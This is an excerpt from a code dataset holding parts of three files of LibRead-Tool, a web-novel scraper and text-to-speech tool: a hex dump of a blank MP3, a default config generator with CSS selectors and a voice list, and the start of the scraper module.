000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000ffe318c4000b2361f800014d4d427d5fbfd4f39ce7a64177e8
4a1ce7febd3ffffce465e46a11ba13c4ce739c60062fffec41518780c075
84ee757b793647ea8bb3ddfe6457f4dd3affe318c40e0a9b621800008d4d
afffffd75d7ecae7643cdb215412828a239fad056a3d036ca148a4728a1f
ffdf4db5ebfba26d4ffffffffb7dfcc7abbc4bcce62d1100124ebbae0dff
e318c41e08f3662008008d4ce24e959587ae1fdeb3baf45fca93553eb95a
94f5ffffff5d5bd28fb29d8fb624414053e398eaa6d81a883c38d2d5027f
fe5ffd96477eba9fffffffffe318c43509cb62200801474df95cafea6473
20b2a071da250a169d67353a64af371d0084aae56753eb51cf3add7a7fb8
fffffffaccf7fd12a332040ec1453953ba59c5f7b0b064ffe318c448094b
66241000474804551f97e7f167e6b2fcbfff5fffffe967f5bb6525fd4f21
2a62d8505c50776121c7670302360a612a1ffd6a9feff45fa7e9fffffffb
7eef499d98ffe318c45d08cb621c00004d4d6aea3d4a7651c50b50cd3b87
97e603e1a1c0cf1c997a1fff6b7eff4ff5ffa7d2c99694dbfffffbb66f93
b218ce6d6851408107535453c6c60ead6cffe318c474099b5e2008004749
adc616993af51dbebffffff5ca9ffffffffeeb4f3a154e256c6b9ca531ca
3145158c1984863217465a3e00043101bffbb7a2153fe9ff54ee9a6befff
e318c48809e3622008014d4dfffff64bbce4a68a880851d5c6086769bf22
b240d3242342b2a0e858e399d5fff97cebe7be104f4078493429774b3a6c
1ef79ffdfffff6eff6bc7bffe318c49b0a9b661c08009330b66bf78ea40f
e943184cbd06420f98480fdc8511f2a706ffe7cfffefb94bffd52fbbff7f
dfabd8c6ae3bb1d852d0dd4350b7902cf456c8ab8a9001ffe318c4ab09b3
6a2408008d4e4f4c8c3d5294fa16612a01bfad77fad93efa2ebf5d5356aa
fffffe7e5c94bdddae33231ce96087193380aaed5580a0aca1889ed512e5
aa364e663fffe318c4bf0b236e1c1000934cd149063e69a32919cc200118
f159c59ffe5ffc8b25ee7bb739cbb573929af7bfdecfa60ccd9b504cda87
18569b11b4a22150d3e807a57de6aa41c9ffe318c4cd0c83621400004d10
12cc89d7f3f6225cafcb97cbfec3fafb0f19a55f502cd924ad8384aafa8b
60f32448cb0faf03a2c848c85411287594b503b29fcfc995e165f36ff5ff
e318c4d60b8b622010005349affe5ffffa94b3ca6efd6d49bc5a4b399204
063ae6ec805313409aa84bacd13942c490203042a89044660a00b9fe3cbd
fcbfffcbdce445d6f3ff9effe318c4e20a6b621c10008d4d7e7ab3ff14ec
7f75949d49fa923d66f1307b671e4f0155595c96483e2f95170751a4408a
84c414da17bcbd73813c3ce709feca87839f1a996e65efffe318c4f30ec3
5e100800532cf9fec2eea519316deb5ad49eb8510c2c8c9923844113e4a8
c422e2c4658c01c4a85720a7ac4d310604c7ff315a7f8320b18b66ee64f2
3afe72fe7fffe318c4f30db36a1c10005348f3d4adf389dc9a932880b944
2a878d38e96d8a0424407120408da21422048a035a7646cd1625892a0547
f244f2a2e7a6e82cc8e48f3330338c8907ffe318c4f70d5b6a1c10005348
7eab95ffa6f521972f0b0c74ed1f8e68e167cc09056365ca8ac7232b407a
b5751d2b949c2e96cc44b32108d5a76a0793fbd06673445d2e7ed59176ff
e318c4fc0d236220180059494622f47ffff2ec6bdff4bec6f3607f54d408
575c4c48449a5d0a264e235174497442ea28d0f449a90d0947e8d0e17ac6
40ce7ae475fffe5d9cacc3ffe318c4ff0e33621c100053494d6edf559669
94cd315d58e3cc9d2f121135012f58d82ab6e708476db03c0dcece9dba62
0a6a2aaa00c5c2c7cdc9851e877f05039c3f24ce5c66efffe318c4ff0ea3
5e1c180053495fe7e176ab16d7e395eae358a912a619192e66f83a1319b3
e7d19d9bfd917995d5201755bc9d1b0742d2f755fede47f2bb58afa22958
ca8f2b833bffe318c4ff10136a1c18005948a1d9a8311102c523b9d4c577
629e88142196c55b2cdb3b17f5d7c72ffbaa7d5da72eb78cd741947e2f48
9d736c283e98a454dbd43cd9a0b60d2634ffe318c4f90d6b621c10005349
75ee1f9fefd7cfed32ffbf1ffffffefffbf2b61baa664bcd7fd7cedcc9d0
9766d12cc29275ee90879a3caa14715d2949ffaebfbb04791613b15eb9ff
e318c4fe0d2b6a2418005964d3fffcbfdaacba8e3550c6a50f1b425fa491
88c4d85c8ca1429b24334e852322122325c05b645486952949e9d9c11b9c
e799d70d9cd99201959545ffe318c4ff0f8b6a181800594844fa7ffefb38
ff5539ca979ad3f2dc4d0a183dd534cf0ae19d864d983afb138a8509922a
9de9882a027fec5e79b23275f2c8425320949991ab5095ffe318c4fb1303
6a08000093108577c8f23ffff2fb4fcf7518abdeb5356b4d44926e5678b9
64a998aee992bc4aaa56b8b0b940d4ed9fffffffffcecfe77e4684c25326
1c984d7f09ffe318c4ea0af362200800534b3091d87342351108d7f34230
908986cecfffff7ca796ae7168d579cac3964540c9849489c91b252444cc
fa88a3c25894aa4c414d45332e39382e32ffe318c4f90d536a2818005348
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa4c414d45332e39382e32aaaaaaaaaaaaaaaaaaff
e318c4fe0ddb5e2418005348aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaffe318c4ff0eab5e101000532caaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaffe318c4ff10cb
65dc00004cbcaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaffe318c4f60000034800000000aaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa54414732205365636f6e647320
6f662053696c656e636500000000000000000000416e617220536f667477
617265204c4c4300000000000000000000000000426c616e6b2041756469
6f0000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000ff
"""
    xxdDump = xxdDump.replace("\n", "")
    return binascii.unhexlify(xxdDump) | 78,058 | Python | .py | 1,283 | 59.829306 | 104 | 0.998763 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,191 | configGenerator.py | Spectre-hidN_LibRead-Tool/src/utils/configGenerator.py | def create_default_config(config_name):
    searchResultSelector = "body > div.main > div.wp > div.row-box > div.col-content > div > div > div > div > div.txt > h3 > a"
    statusSelectorI = "body > div.main > div > div > div.col-content > div.m-info > div.m-book1 > div.m-imgtxt > div.txt > div:nth-child(6) > div > span"
    statusSelectorII = "body > div.main > div > div > div.col-content > div.m-info > div.m-book1 > div.m-imgtxt > div.txt > div:nth-child(5) > div > span"
    statusSelectorIII = "body > div.main > div > div > div.col-content > div.m-info > div.m-book1 > div.m-imgtxt > div.txt > div:nth-child(4) > div > span"
    totalChaptersSelector = "#idData > li > a"
    coverImageDivSelector = "body > div.main > div > div > div.col-content > div.m-info > div.m-book1 > div.m-imgtxt > div.pic > img"
    articleDivSelector = "#article > p"
    with open(config_name, 'w', encoding='utf-8') as cf:
        cf.write(f"""[DOMAIN]
; Change the domain name
domainName = libread.com
; Modify the headers if the server is blocking your requests for being headless.
origin = https://libread.com
referer = https://libread.com/
authority = libread.com
userAgent = Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[SELECTOR_MAPS]
; These are advanced settings to adjust if the website changes its document structure.
; IT IS NOT RECOMMENDED TO MODIFY THEM.
searchResultSelector = {searchResultSelector}
statusSelectorI = {statusSelectorI}
statusSelectorII = {statusSelectorII}
statusSelectorIII = {statusSelectorIII}
totalChaptersSelector = {totalChaptersSelector}
coverImageDivSelector = {coverImageDivSelector}
articleDivSelector = {articleDivSelector}
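; (For reference only: these values look like standard CSS selectors, so they are presumably fed to
; whatever HTML parser LibRead-Tool uses -- e.g. something along the lines of
; soup.select(searchResultSelector) in BeautifulSoup terms. That usage is an assumption for
; illustration, not something configured here.)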
[NOMENCLATURES]
; You can only use the variables below to set up a name. Use ! at both ends to indicate it is a variable.
; TITLE -> Name of the novel
; STARTCHAPTER -> Indicates the starting chapter number of the part
; ENDCHAPTER -> Indicates the ending chapter number of the part
; Change the nomenclature for the output files. Affects both the .txt and the .mp3 file.
outputNomenclature = !TITLE! ~ Chapter-!STARTCHAPTER!-!ENDCHAPTER!
; Nomenclature for the cover image
coverImageNomenclature = !TITLE! ~ Cover
; Replace WHITESPACE
; By default it doesn't replace any WHITESPACE.
; But if any of the variables contains a WHITESPACE, it will be replaced by the given character.
whitespaceReplacementCharacter =
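; Illustrative example (assuming a novel titled "My Novel" and a part covering chapters 1-50):
; with the default nomenclatures above, the part would be saved as
; "My Novel ~ Chapter-1-50.txt" / "My Novel ~ Chapter-1-50.mp3" and the cover as "My Novel ~ Cover".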
[TTS_CONFIG]
; Choose a voice name from the below list
Voice = en-GB-SoniaNeural
; Embed unsynced subtitles to the mp3 file
; 1 = yes, 0 = no
embedSubtitles = 1
; Enabling the below switch will force LibRead-Tool to fetch all the articles of a part first, then convert them to speech.
; This is usually needed when FFMPEG is not accessible to LibRead-Tool.
; 1 = yes, 0 = no
forceGrabFirstThenConvert = 0
; If the below switch is enabled, then LibRead-Tool will replace the existing parts with the new ones.
; However, if you deactivate the switch, LibRead-Tool will not overwrite the material if the part file already exists, even if the contents are only partially available.
; Disabling this will force the "forceGrabFirstThenConvert" switch to be enabled.
; 1 = yes, 0 = no
replacePartContents = 1
; All voices are listed below
; Name: af-ZA-AdriNeural
; Gender: Female
;
; Name: af-ZA-WillemNeural
; Gender: Male
;
; Name: am-ET-AmehaNeural
; Gender: Male
;
; Name: am-ET-MekdesNeural
; Gender: Female
;
; Name: ar-AE-FatimaNeural
; Gender: Female
;
; Name: ar-AE-HamdanNeural
; Gender: Male
;
; Name: ar-BH-AliNeural
; Gender: Male
;
; Name: ar-BH-LailaNeural
; Gender: Female
;
; Name: ar-DZ-AminaNeural
; Gender: Female
;
; Name: ar-DZ-IsmaelNeural
; Gender: Male
;
; Name: ar-EG-SalmaNeural
; Gender: Female
;
; Name: ar-EG-ShakirNeural
; Gender: Male
;
; Name: ar-IQ-BasselNeural
; Gender: Male
;
; Name: ar-IQ-RanaNeural
; Gender: Female
;
; Name: ar-JO-SanaNeural
; Gender: Female
;
; Name: ar-JO-TaimNeural
; Gender: Male
;
; Name: ar-KW-FahedNeural
; Gender: Male
;
; Name: ar-KW-NouraNeural
; Gender: Female
;
; Name: ar-LB-LaylaNeural
; Gender: Female
;
; Name: ar-LB-RamiNeural
; Gender: Male
;
; Name: ar-LY-ImanNeural
; Gender: Female
;
; Name: ar-LY-OmarNeural
; Gender: Male
;
; Name: ar-MA-JamalNeural
; Gender: Male
;
; Name: ar-MA-MounaNeural
; Gender: Female
;
; Name: ar-OM-AbdullahNeural
; Gender: Male
;
; Name: ar-OM-AyshaNeural
; Gender: Female
;
; Name: ar-QA-AmalNeural
; Gender: Female
;
; Name: ar-QA-MoazNeural
; Gender: Male
;
; Name: ar-SA-HamedNeural
; Gender: Male
;
; Name: ar-SA-ZariyahNeural
; Gender: Female
;
; Name: ar-SY-AmanyNeural
; Gender: Female
;
; Name: ar-SY-LaithNeural
; Gender: Male
;
; Name: ar-TN-HediNeural
; Gender: Male
;
; Name: ar-TN-ReemNeural
; Gender: Female
;
; Name: ar-YE-MaryamNeural
; Gender: Female
;
; Name: ar-YE-SalehNeural
; Gender: Male
;
; Name: az-AZ-BabekNeural
; Gender: Male
;
; Name: az-AZ-BanuNeural
; Gender: Female
;
; Name: bg-BG-BorislavNeural
; Gender: Male
;
; Name: bg-BG-KalinaNeural
; Gender: Female
;
; Name: bn-BD-NabanitaNeural
; Gender: Female
;
; Name: bn-BD-PradeepNeural
; Gender: Male
;
; Name: bn-IN-BashkarNeural
; Gender: Male
;
; Name: bn-IN-TanishaaNeural
; Gender: Female
;
; Name: bs-BA-GoranNeural
; Gender: Male
;
; Name: bs-BA-VesnaNeural
; Gender: Female
;
; Name: ca-ES-EnricNeural
; Gender: Male
;
; Name: ca-ES-JoanaNeural
; Gender: Female
;
; Name: cs-CZ-AntoninNeural
; Gender: Male
;
; Name: cs-CZ-VlastaNeural
; Gender: Female
;
; Name: cy-GB-AledNeural
; Gender: Male
;
; Name: cy-GB-NiaNeural
; Gender: Female
;
; Name: da-DK-ChristelNeural
; Gender: Female
;
; Name: da-DK-JeppeNeural
; Gender: Male
;
; Name: de-AT-IngridNeural
; Gender: Female
;
; Name: de-AT-JonasNeural
; Gender: Male
;
; Name: de-CH-JanNeural
; Gender: Male
;
; Name: de-CH-LeniNeural
; Gender: Female
;
; Name: de-DE-AmalaNeural
; Gender: Female
;
; Name: de-DE-ConradNeural
; Gender: Male
;
; Name: de-DE-FlorianMultilingualNeural
; Gender: Male
;
; Name: de-DE-KatjaNeural
; Gender: Female
;
; Name: de-DE-KillianNeural
; Gender: Male
;
; Name: de-DE-SeraphinaMultilingualNeural
; Gender: Female
;
; Name: el-GR-AthinaNeural
; Gender: Female
;
; Name: el-GR-NestorasNeural
; Gender: Male
;
; Name: en-AU-NatashaNeural
; Gender: Female
;
; Name: en-AU-WilliamNeural
; Gender: Male
;
; Name: en-CA-ClaraNeural
; Gender: Female
;
; Name: en-CA-LiamNeural
; Gender: Male
;
; Name: en-GB-LibbyNeural
; Gender: Female
;
; Name: en-GB-MaisieNeural
; Gender: Female
;
; Name: en-GB-RyanNeural
; Gender: Male
;
; Name: en-GB-SoniaNeural
; Gender: Female
;
; Name: en-GB-ThomasNeural
; Gender: Male
;
; Name: en-HK-SamNeural
; Gender: Male
;
; Name: en-HK-YanNeural
; Gender: Female
;
; Name: en-IE-ConnorNeural
; Gender: Male
;
; Name: en-IE-EmilyNeural
; Gender: Female
;
; Name: en-IN-NeerjaExpressiveNeural
; Gender: Female
;
; Name: en-IN-NeerjaNeural
; Gender: Female
;
; Name: en-IN-PrabhatNeural
; Gender: Male
;
; Name: en-KE-AsiliaNeural
; Gender: Female
;
; Name: en-KE-ChilembaNeural
; Gender: Male
;
; Name: en-NG-AbeoNeural
; Gender: Male
;
; Name: en-NG-EzinneNeural
; Gender: Female
;
; Name: en-NZ-MitchellNeural
; Gender: Male
;
; Name: en-NZ-MollyNeural
; Gender: Female
;
; Name: en-PH-JamesNeural
; Gender: Male
;
; Name: en-PH-RosaNeural
; Gender: Female
;
; Name: en-SG-LunaNeural
; Gender: Female
;
; Name: en-SG-WayneNeural
; Gender: Male
;
; Name: en-TZ-ElimuNeural
; Gender: Male
;
; Name: en-TZ-ImaniNeural
; Gender: Female
;
; Name: en-US-AnaNeural
; Gender: Female
;
; Name: en-US-AndrewNeural
; Gender: Male
;
; Name: en-US-AriaNeural
; Gender: Female
;
; Name: en-US-AvaNeural
; Gender: Female
;
; Name: en-US-BrianNeural
; Gender: Male
;
; Name: en-US-ChristopherNeural
; Gender: Male
;
; Name: en-US-EmmaNeural
; Gender: Female
;
; Name: en-US-EricNeural
; Gender: Male
;
; Name: en-US-GuyNeural
; Gender: Male
;
; Name: en-US-JennyNeural
; Gender: Female
;
; Name: en-US-MichelleNeural
; Gender: Female
;
; Name: en-US-RogerNeural
; Gender: Male
;
; Name: en-US-SteffanNeural
; Gender: Male
;
; Name: en-ZA-LeahNeural
; Gender: Female
;
; Name: en-ZA-LukeNeural
; Gender: Male
;
; Name: es-AR-ElenaNeural
; Gender: Female
;
; Name: es-AR-TomasNeural
; Gender: Male
;
; Name: es-BO-MarceloNeural
; Gender: Male
;
; Name: es-BO-SofiaNeural
; Gender: Female
;
; Name: es-CL-CatalinaNeural
; Gender: Female
;
; Name: es-CL-LorenzoNeural
; Gender: Male
;
; Name: es-CO-GonzaloNeural
; Gender: Male
;
; Name: es-CO-SalomeNeural
; Gender: Female
;
; Name: es-CR-JuanNeural
; Gender: Male
;
; Name: es-CR-MariaNeural
; Gender: Female
;
; Name: es-CU-BelkysNeural
; Gender: Female
;
; Name: es-CU-ManuelNeural
; Gender: Male
;
; Name: es-DO-EmilioNeural
; Gender: Male
;
; Name: es-DO-RamonaNeural
; Gender: Female
;
; Name: es-EC-AndreaNeural
; Gender: Female
;
; Name: es-EC-LuisNeural
; Gender: Male
;
; Name: es-ES-AlvaroNeural
; Gender: Male
;
; Name: es-ES-ElviraNeural
; Gender: Female
;
; Name: es-ES-XimenaNeural
; Gender: Female
;
; Name: es-GQ-JavierNeural
; Gender: Male
;
; Name: es-GQ-TeresaNeural
; Gender: Female
;
; Name: es-GT-AndresNeural
; Gender: Male
;
; Name: es-GT-MartaNeural
; Gender: Female
;
; Name: es-HN-CarlosNeural
; Gender: Male
;
; Name: es-HN-KarlaNeural
; Gender: Female
;
; Name: es-MX-DaliaNeural
; Gender: Female
;
; Name: es-MX-JorgeNeural
; Gender: Male
;
; Name: es-NI-FedericoNeural
; Gender: Male
;
; Name: es-NI-YolandaNeural
; Gender: Female
;
; Name: es-PA-MargaritaNeural
; Gender: Female
;
; Name: es-PA-RobertoNeural
; Gender: Male
;
; Name: es-PE-AlexNeural
; Gender: Male
;
; Name: es-PE-CamilaNeural
; Gender: Female
;
; Name: es-PR-KarinaNeural
; Gender: Female
;
; Name: es-PR-VictorNeural
; Gender: Male
;
; Name: es-PY-MarioNeural
; Gender: Male
;
; Name: es-PY-TaniaNeural
; Gender: Female
;
; Name: es-SV-LorenaNeural
; Gender: Female
;
; Name: es-SV-RodrigoNeural
; Gender: Male
;
; Name: es-US-AlonsoNeural
; Gender: Male
;
; Name: es-US-PalomaNeural
; Gender: Female
;
; Name: es-UY-MateoNeural
; Gender: Male
;
; Name: es-UY-ValentinaNeural
; Gender: Female
;
; Name: es-VE-PaolaNeural
; Gender: Female
;
; Name: es-VE-SebastianNeural
; Gender: Male
;
; Name: et-EE-AnuNeural
; Gender: Female
;
; Name: et-EE-KertNeural
; Gender: Male
;
; Name: fa-IR-DilaraNeural
; Gender: Female
;
; Name: fa-IR-FaridNeural
; Gender: Male
;
; Name: fi-FI-HarriNeural
; Gender: Male
;
; Name: fi-FI-NooraNeural
; Gender: Female
;
; Name: fil-PH-AngeloNeural
; Gender: Male
;
; Name: fil-PH-BlessicaNeural
; Gender: Female
;
; Name: fr-BE-CharlineNeural
; Gender: Female
;
; Name: fr-BE-GerardNeural
; Gender: Male
;
; Name: fr-CA-AntoineNeural
; Gender: Male
;
; Name: fr-CA-JeanNeural
; Gender: Male
;
; Name: fr-CA-SylvieNeural
; Gender: Female
;
; Name: fr-CA-ThierryNeural
; Gender: Male
;
; Name: fr-CH-ArianeNeural
; Gender: Female
;
; Name: fr-CH-FabriceNeural
; Gender: Male
;
; Name: fr-FR-DeniseNeural
; Gender: Female
;
; Name: fr-FR-EloiseNeural
; Gender: Female
;
; Name: fr-FR-HenriNeural
; Gender: Male
;
; Name: fr-FR-RemyMultilingualNeural
; Gender: Male
;
; Name: fr-FR-VivienneMultilingualNeural
; Gender: Female
;
; Name: ga-IE-ColmNeural
; Gender: Male
;
; Name: ga-IE-OrlaNeural
; Gender: Female
;
; Name: gl-ES-RoiNeural
; Gender: Male
;
; Name: gl-ES-SabelaNeural
; Gender: Female
;
; Name: gu-IN-DhwaniNeural
; Gender: Female
;
; Name: gu-IN-NiranjanNeural
; Gender: Male
;
; Name: he-IL-AvriNeural
; Gender: Male
;
; Name: he-IL-HilaNeural
; Gender: Female
;
; Name: hi-IN-MadhurNeural
; Gender: Male
;
; Name: hi-IN-SwaraNeural
; Gender: Female
;
; Name: hr-HR-GabrijelaNeural
; Gender: Female
;
; Name: hr-HR-SreckoNeural
; Gender: Male
;
; Name: hu-HU-NoemiNeural
; Gender: Female
;
; Name: hu-HU-TamasNeural
; Gender: Male
;
; Name: id-ID-ArdiNeural
; Gender: Male
;
; Name: id-ID-GadisNeural
; Gender: Female
;
; Name: is-IS-GudrunNeural
; Gender: Female
;
; Name: is-IS-GunnarNeural
; Gender: Male
;
; Name: it-IT-DiegoNeural
; Gender: Male
;
; Name: it-IT-ElsaNeural
; Gender: Female
;
; Name: it-IT-GiuseppeNeural
; Gender: Male
;
; Name: it-IT-IsabellaNeural
; Gender: Female
;
; Name: ja-JP-KeitaNeural
; Gender: Male
;
; Name: ja-JP-NanamiNeural
; Gender: Female
;
; Name: jv-ID-DimasNeural
; Gender: Male
;
; Name: jv-ID-SitiNeural
; Gender: Female
;
; Name: ka-GE-EkaNeural
; Gender: Female
;
; Name: ka-GE-GiorgiNeural
; Gender: Male
;
; Name: kk-KZ-AigulNeural
; Gender: Female
;
; Name: kk-KZ-DauletNeural
; Gender: Male
;
; Name: km-KH-PisethNeural
; Gender: Male
;
; Name: km-KH-SreymomNeural
; Gender: Female
;
; Name: kn-IN-GaganNeural
; Gender: Male
;
; Name: kn-IN-SapnaNeural
; Gender: Female
;
; Name: ko-KR-HyunsuNeural
; Gender: Male
;
; Name: ko-KR-InJoonNeural
; Gender: Male
;
; Name: ko-KR-SunHiNeural
; Gender: Female
;
; Name: lo-LA-ChanthavongNeural
; Gender: Male
;
; Name: lo-LA-KeomanyNeural
; Gender: Female
;
; Name: lt-LT-LeonasNeural
; Gender: Male
;
; Name: lt-LT-OnaNeural
; Gender: Female
;
; Name: lv-LV-EveritaNeural
; Gender: Female
;
; Name: lv-LV-NilsNeural
; Gender: Male
;
; Name: mk-MK-AleksandarNeural
; Gender: Male
;
; Name: mk-MK-MarijaNeural
; Gender: Female
;
; Name: ml-IN-MidhunNeural
; Gender: Male
;
; Name: ml-IN-SobhanaNeural
; Gender: Female
;
; Name: mn-MN-BataaNeural
; Gender: Male
;
; Name: mn-MN-YesuiNeural
; Gender: Female
;
; Name: mr-IN-AarohiNeural
; Gender: Female
;
; Name: mr-IN-ManoharNeural
; Gender: Male
;
; Name: ms-MY-OsmanNeural
; Gender: Male
;
; Name: ms-MY-YasminNeural
; Gender: Female
;
; Name: mt-MT-GraceNeural
; Gender: Female
;
; Name: mt-MT-JosephNeural
; Gender: Male
;
; Name: my-MM-NilarNeural
; Gender: Female
;
; Name: my-MM-ThihaNeural
; Gender: Male
;
; Name: nb-NO-FinnNeural
; Gender: Male
;
; Name: nb-NO-PernilleNeural
; Gender: Female
;
; Name: ne-NP-HemkalaNeural
; Gender: Female
;
; Name: ne-NP-SagarNeural
; Gender: Male
;
; Name: nl-BE-ArnaudNeural
; Gender: Male
;
; Name: nl-BE-DenaNeural
; Gender: Female
;
; Name: nl-NL-ColetteNeural
; Gender: Female
;
; Name: nl-NL-FennaNeural
; Gender: Female
;
; Name: nl-NL-MaartenNeural
; Gender: Male
;
; Name: pl-PL-MarekNeural
; Gender: Male
;
; Name: pl-PL-ZofiaNeural
; Gender: Female
;
; Name: ps-AF-GulNawazNeural
; Gender: Male
;
; Name: ps-AF-LatifaNeural
; Gender: Female
;
; Name: pt-BR-AntonioNeural
; Gender: Male
;
; Name: pt-BR-FranciscaNeural
; Gender: Female
;
; Name: pt-BR-ThalitaNeural
; Gender: Female
;
; Name: pt-PT-DuarteNeural
; Gender: Male
;
; Name: pt-PT-RaquelNeural
; Gender: Female
;
; Name: ro-RO-AlinaNeural
; Gender: Female
;
; Name: ro-RO-EmilNeural
; Gender: Male
;
; Name: ru-RU-DmitryNeural
; Gender: Male
;
; Name: ru-RU-SvetlanaNeural
; Gender: Female
;
; Name: si-LK-SameeraNeural
; Gender: Male
;
; Name: si-LK-ThiliniNeural
; Gender: Female
;
; Name: sk-SK-LukasNeural
; Gender: Male
;
; Name: sk-SK-ViktoriaNeural
; Gender: Female
;
; Name: sl-SI-PetraNeural
; Gender: Female
;
; Name: sl-SI-RokNeural
; Gender: Male
;
; Name: so-SO-MuuseNeural
; Gender: Male
;
; Name: so-SO-UbaxNeural
; Gender: Female
;
; Name: sq-AL-AnilaNeural
; Gender: Female
;
; Name: sq-AL-IlirNeural
; Gender: Male
;
; Name: sr-RS-NicholasNeural
; Gender: Male
;
; Name: sr-RS-SophieNeural
; Gender: Female
;
; Name: su-ID-JajangNeural
; Gender: Male
;
; Name: su-ID-TutiNeural
; Gender: Female
;
; Name: sv-SE-MattiasNeural
; Gender: Male
;
; Name: sv-SE-SofieNeural
; Gender: Female
;
; Name: sw-KE-RafikiNeural
; Gender: Male
;
; Name: sw-KE-ZuriNeural
; Gender: Female
;
; Name: sw-TZ-DaudiNeural
; Gender: Male
;
; Name: sw-TZ-RehemaNeural
; Gender: Female
;
; Name: ta-IN-PallaviNeural
; Gender: Female
;
; Name: ta-IN-ValluvarNeural
; Gender: Male
;
; Name: ta-LK-KumarNeural
; Gender: Male
;
; Name: ta-LK-SaranyaNeural
; Gender: Female
;
; Name: ta-MY-KaniNeural
; Gender: Female
;
; Name: ta-MY-SuryaNeural
; Gender: Male
;
; Name: ta-SG-AnbuNeural
; Gender: Male
;
; Name: ta-SG-VenbaNeural
; Gender: Female
;
; Name: te-IN-MohanNeural
; Gender: Male
;
; Name: te-IN-ShrutiNeural
; Gender: Female
;
; Name: th-TH-NiwatNeural
; Gender: Male
;
; Name: th-TH-PremwadeeNeural
; Gender: Female
;
; Name: tr-TR-AhmetNeural
; Gender: Male
;
; Name: tr-TR-EmelNeural
; Gender: Female
;
; Name: uk-UA-OstapNeural
; Gender: Male
;
; Name: uk-UA-PolinaNeural
; Gender: Female
;
; Name: ur-IN-GulNeural
; Gender: Female
;
; Name: ur-IN-SalmanNeural
; Gender: Male
;
; Name: ur-PK-AsadNeural
; Gender: Male
;
; Name: ur-PK-UzmaNeural
; Gender: Female
;
; Name: uz-UZ-MadinaNeural
; Gender: Female
;
; Name: uz-UZ-SardorNeural
; Gender: Male
;
; Name: vi-VN-HoaiMyNeural
; Gender: Female
;
; Name: vi-VN-NamMinhNeural
; Gender: Male
;
; Name: zh-CN-XiaoxiaoNeural
; Gender: Female
;
; Name: zh-CN-XiaoyiNeural
; Gender: Female
;
; Name: zh-CN-YunjianNeural
; Gender: Male
;
; Name: zh-CN-YunxiNeural
; Gender: Male
;
; Name: zh-CN-YunxiaNeural
; Gender: Male
;
; Name: zh-CN-YunyangNeural
; Gender: Male
;
; Name: zh-CN-liaoning-XiaobeiNeural
; Gender: Female
;
; Name: zh-CN-shaanxi-XiaoniNeural
; Gender: Female
;
; Name: zh-HK-HiuGaaiNeural
; Gender: Female
;
; Name: zh-HK-HiuMaanNeural
; Gender: Female
;
; Name: zh-HK-WanLungNeural
; Gender: Male
;
; Name: zh-TW-HsiaoChenNeural
; Gender: Female
;
; Name: zh-TW-HsiaoYuNeural
; Gender: Female
;
; Name: zh-TW-YunJheNeural
; Gender: Male
;
; Name: zu-ZA-ThandoNeural
; Gender: Female
;
; Name: zu-ZA-ThembaNeural
; Gender: Male""")
cf.close()
| 17,755 | Python | .py | 998 | 16.365731 | 169 | 0.725966 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,192 | scrapper.py | Spectre-hidN_LibRead-Tool/src/utils/scrapper.py | import requests
from bs4 import BeautifulSoup
import os
import configparser
from .Prettify import Prettify
from .configGenerator import create_default_config
from requests.packages.urllib3.exceptions import InsecureRequestWarning #type: ignore
import urllib3
CONFIG_FILE = "libread-config.ini"
global DOMAIN_NAME
global SEARCH_PAGE_SELECTOR, STATUS_SELECTOR_I, STATUS_SELECTOR_II, STATUS_SELECTOR_III, CHAPTER_SELECTOR, IMAGE_URL_SELECTOR, ARTICLE_DIV_SELECTOR
global HEADERS
printWar = Prettify.printWar
printSuc = Prettify.printSuc
printErr = Prettify.printErr
def _readConfig():
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if(os.path.isfile(CONFIG_FILE)):
try:
config = configparser.ConfigParser()
config.read(CONFIG_FILE)
global SEARCH_PAGE_SELECTOR, STATUS_SELECTOR_I, STATUS_SELECTOR_II, STATUS_SELECTOR_III, CHAPTER_SELECTOR, IMAGE_URL_SELECTOR, ARTICLE_DIV_SELECTOR
SEARCH_PAGE_SELECTOR = config.get("SELECTOR_MAPS", "searchResultSelector")
STATUS_SELECTOR_I = config.get("SELECTOR_MAPS", "statusSelectorI")
STATUS_SELECTOR_II = config.get("SELECTOR_MAPS", "statusSelectorII")
STATUS_SELECTOR_III = config.get("SELECTOR_MAPS", "statusSelectorIII")
CHAPTER_SELECTOR = config.get("SELECTOR_MAPS", "totalChaptersSelector")
IMAGE_URL_SELECTOR = config.get("SELECTOR_MAPS", "coverImageDivSelector")
ARTICLE_DIV_SELECTOR = config.get("SELECTOR_MAPS", "articleDivSelector")
global HEADERS
HEADERS = {
'authority': config.get("DOMAIN", "authority"),
'User-Agent' : config.get("DOMAIN", "userAgent"),
'origin': config.get("DOMAIN", "origin"),
